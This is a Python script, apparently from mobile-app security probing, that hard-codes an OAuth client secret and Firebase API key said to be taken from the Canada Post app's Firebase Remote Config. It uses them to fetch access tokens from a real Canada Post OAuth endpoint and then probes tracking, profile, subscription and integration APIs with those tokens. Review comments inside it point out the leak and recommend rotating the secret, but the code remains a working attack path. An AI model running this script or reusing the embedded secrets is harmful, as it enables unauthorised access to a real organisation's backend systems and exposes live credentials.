#!/usr/bin/env python3
"""
Extract credentials from Canada Post app directly
Uses the known OAuth credentials and tests the APIs
"""

import requests
import json
import base64
from datetime import datetime

# Known credentials from Firebase Remote Config (already found)
# NOTE(review): CLIENT_SECRET is an OAuth client secret stored in plain text in this
# file. Going by the line above, it reached the mobile app through Firebase Remote
# Config, so every installed copy of the app can read it and it cannot serve as proof
# of client identity. Defensive follow-up for the owning team: rotate the secret, stop
# delivering it to devices, and treat the mobile client as a public client (confirm
# which grants the authorization server allows for this client_id).
# NOTE(review): for any authorised testing, load these values from the environment or
# a secret store rather than committing them.
CLIENT_ID = "cpc-appcheck-android"
CLIENT_SECRET = "1mhxwdN1Y5afLQgYeEgZ"
# FIREBASE_PROJECT and FIREBASE_API_KEY are not referenced by the visible code.
# NOTE(review): a Firebase API key identifies the project rather than authorising
# access, so protection has to come from key restrictions and backend rules -- confirm
# those are in place for this key.
FIREBASE_PROJECT = "canada-post-2dce9"
FIREBASE_API_KEY = "AIzaSyDWtJr2knyZpJEOgBlJH_lBk-xqlnQJ27Q"
# Token endpoint used by get_user_token() and tracking endpoint used by
# test_tracking_api().
OAUTH_ENDPOINT = "https://oauth-osu.canadapost-postescanada.ca/mga/sps/oauth/oauth20/token"
TRACKING_ENDPOINT = "https://www.canadapost-postescanada.ca/mgw/trackpackage/json/package"

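def _print_unverified_jwt_claims(token):
    """Print the claims of a JWT-shaped token without verifying its signature.

    The payload segment is base64url-decoded and parsed as JSON purely for
    display. Nothing here checks the signature, so the printed claims must not
    be used for any trust decision.
    """
    payload = token.split('.')[1]
    # JWT segments omit '=' padding; restore it so the base64 decoder accepts them.
    payload += '=' * (-len(payload) % 4)
    try:
        claims = json.loads(base64.urlsafe_b64decode(payload))
        if not isinstance(claims, dict):
            raise ValueError("JWT payload is not a JSON object")
    except ValueError as e:
        # binascii.Error, UnicodeDecodeError and JSONDecodeError are all ValueErrors.
        print(f"\n[!] Could not decode token: {e}")
        return

    print("\n[📋] Token Claims:")
    for key, value in claims.items():
        print(f"    {key}: {value}")


def get_user_token(test_credentials=None):
    """Request an OAuth access token from OAUTH_ENDPOINT and return it.

    Despite the name, the request uses ``grant_type=client_credentials``, so any
    token returned is issued to the client application rather than to a
    signed-in user.

    Args:
        test_credentials: Accepted for interface compatibility; not used.

    Returns:
        The ``access_token`` string from the token response, or ``None`` when
        the request fails, the status is not 200, the body is not JSON, or the
        response carries no usable ``access_token``.
    """
    print("\n" + "="*80)
    print("  STEP 1: OBTAINING USER SESSION TOKEN")
    print("="*80)

    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Canada Post Android App",
    }

    # OAuth payload for client credentials flow
    data = {
        "grant_type": "client_credentials",
        "client_id": CLIENT_ID,
        "client_secret": CLIENT_SECRET,
        "scope": "openid profile email"
    }

    print(f"\n[*] Requesting token from: {OAUTH_ENDPOINT}")
    print(f"[*] Using client_id: {CLIENT_ID}")

    try:
        # Certificate verification stays at the requests default (enabled): this
        # request carries the client secret, so the server must be authenticated.
        response = requests.post(OAUTH_ENDPOINT, headers=headers, data=data, timeout=10)
        print(f"[*] Response status: {response.status_code}")

        if response.status_code != 200:
            print("[!] Failed to get token")
            print(f"[!] Response: {response.text}")
            return None

        token_data = response.json()
    except (requests.RequestException, ValueError) as e:
        # Network/TLS failures and non-JSON bodies are reported, not raised.
        print(f"[!] Error: {e}")
        return None

    token = token_data.get('access_token') if isinstance(token_data, dict) else None
    if not (isinstance(token, str) and token):
        print("\n[!] No access_token in response")
        print(f"[!] Response: {response.text}")
        return None

    print("\n[✓] Token obtained successfully!")
    print(f"[*] Token type: {token_data.get('token_type', 'Bearer')}")
    print(f"[*] Expires in: {token_data.get('expires_in', 'unknown')} seconds")

    # A bearer token is a credential: show only a short prefix and its length so
    # it does not land in terminal scrollback or captured logs. Callers still
    # receive the full value through the return value.
    print("\n[🔑] ACCESS TOKEN:")
    print(f"    {token[:8]}... ({len(token)} chars, remainder not shown)")

    # Three dot-separated segments is the JWT compact form; show its claims.
    if token.count('.') == 2:
        _print_unverified_jwt_claims(token)

    return token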

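def test_tracking_api(token, package_number="1234567890"):
    """Query TRACKING_ENDPOINT with a bearer token and print a response preview.

    Args:
        token: Access token sent in the ``Authorization: Bearer`` header. A
            falsy value skips the request.
        package_number: Value sent as the ``pins`` query parameter.

    Returns:
        The parsed JSON body on HTTP 200; ``None`` when the token is missing,
        the status is not 200, the request fails, or the body is not JSON.
    """
    print("\n" + "="*80)
    print("  STEP 2: TESTING TRACKING API")
    print("="*80)

    if not token:
        print("[!] No token provided, skipping tracking test")
        return None

    headers = {
        "Authorization": f"Bearer {token}",
        "User-Agent": "Canada Post Android App",
        "Accept": "application/json",
    }

    params = {
        "pins": package_number
    }

    print(f"\n[*] Testing tracking endpoint: {TRACKING_ENDPOINT}")
    print(f"[*] Package number: {package_number}")

    try:
        # Certificate verification stays at the requests default (enabled): the
        # bearer token must only be sent to an authenticated server.
        response = requests.get(TRACKING_ENDPOINT, headers=headers, params=params, timeout=10)
        print(f"[*] Response status: {response.status_code}")

        if response.status_code != 200:
            print(f"[!] Got status: {response.status_code}")
            print(f"[!] Response: {response.text[:200]}")
            return None

        data = response.json()
    except (requests.RequestException, ValueError) as e:
        # Network/TLS failures and non-JSON bodies are reported, not raised.
        print(f"[!] Error: {e}")
        return None

    print("\n[✓] Tracking data obtained!")
    print("[*] Response preview:")
    # Only the first 500 characters of the pretty-printed body are shown.
    print(json.dumps(data, indent=2)[:500])

    return data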

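def test_mobile_integration_api(token):
    """POST an empty JSON body to each hard-coded endpoint and print the status.

    The same bearer token is attached to every request, although the listed
    hosts sit on different domains from the token endpoint.
    NOTE(review): whether the token is meant to be accepted by these backends
    cannot be told from this file. A resource server should reject tokens that
    were not issued for its audience.

    Args:
        token: Access token sent in the ``Authorization: Bearer`` header. A
            falsy value skips all requests.

    Returns:
        None. Results are only printed.
    """
    print("\n" + "="*80)
    print("  STEP 3: TESTING MOBILE INTEGRATION API")
    print("="*80)

    if not token:
        print("[!] No token provided, skipping")
        return

    headers = {
        "Authorization": f"Bearer {token}",
        "User-Agent": "Canada Post Android App",
        "Content-Type": "application/json",
    }

    endpoints = [
        "https://mobileintegration.1eqh5zpddmks.us-east.codeengine.appdomain.cloud/api/v1/web/de64ec88-9d4b-4925-a98d-65678e01b6bb/default/MobileIntegration",
        "https://q26ff9ws86.execute-api.ca-central-1.amazonaws.com/prod/v1/user/profile",
        "https://q26ff9ws86.execute-api.ca-central-1.amazonaws.com/prod/v1/subscriptions",
    ]

    for endpoint in endpoints:
        print(f"\n[*] Testing: {endpoint[:60]}...")

        try:
            # Certificate verification stays at the requests default (enabled):
            # the bearer token must only be sent to an authenticated server.
            response = requests.post(endpoint, headers=headers, json={}, timeout=5)
        except requests.RequestException as e:
            # One unreachable endpoint must not stop the remaining checks.
            print(f"    Error: {e}")
            continue

        print(f"    Status: {response.status_code}")

        # Bodies are previewed only for non-error (< 400) responses.
        if response.status_code < 400:
            print(f"    Response: {response.text[:100]}")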

# Disable SSL warnings
# This runs at import time, outside the __main__ guard, so it applies to any process
# that imports this module. It silences the InsecureRequestWarning that urllib3 emits
# for HTTPS requests made with certificate verification turned off.
# NOTE(review): suppressing the warning hides unverified TLS connections from whoever
# runs the script. Prefer leaving verification enabled and dropping this call.
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

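if __name__ == "__main__":
    # Script entry point: request a token, then run the two API checks with it.
    print("\n" + "="*80)
    print("  CANADA POST API - DIRECT CREDENTIAL EXTRACTION")
    print("="*80)
    print("\nUsing known OAuth credentials from Firebase Remote Config:")
    print(f"  Client ID: {CLIENT_ID}")
    # The client secret is a credential: never echo it to stdout, where it would
    # end up in terminal scrollback or captured job logs.
    print("  Client Secret: [redacted]")
    print(f"  OAuth Endpoint: {OAUTH_ENDPOINT}")

    # Step 1: Get token
    token = get_user_token()

    # Steps 2 and 3 need a token, so both are skipped when step 1 failed.
    if token:
        # Step 2: Test tracking
        test_tracking_api(token, "1234567890")

        # Step 3: Test other APIs
        test_mobile_integration_api(token)

    print("\n" + "="*80)
    print("  DONE")
    print("="*80)
    print("\n[*] If token was obtained, you can use it for further API testing")
    print("[*] Save the token for later use in test_apis.py\n")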
